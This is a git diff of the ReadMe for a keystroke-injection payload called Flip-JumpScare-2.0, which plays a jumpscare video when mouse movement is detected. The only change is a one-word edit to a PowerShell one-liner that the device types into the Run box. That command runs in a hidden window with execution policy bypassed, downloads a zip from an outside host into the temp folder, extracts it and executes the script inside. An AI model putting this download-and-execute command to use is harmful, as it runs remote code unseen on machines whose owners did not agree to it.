diff --git a/Payloads/Flip-JumpScare-2.0/ReadMe.md b/Payloads/Flip-JumpScare-2.0/ReadMe.md index 012078d..95f25dc 100644 --- a/Payloads/Flip-JumpScare-2.0/ReadMe.md +++ b/Payloads/Flip-JumpScare-2.0/ReadMe.md @@ -47,7 +47,7 @@ When a mouse movement is detected, that video will be played in the PowerShell c * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload ``` -powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" +powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1" ```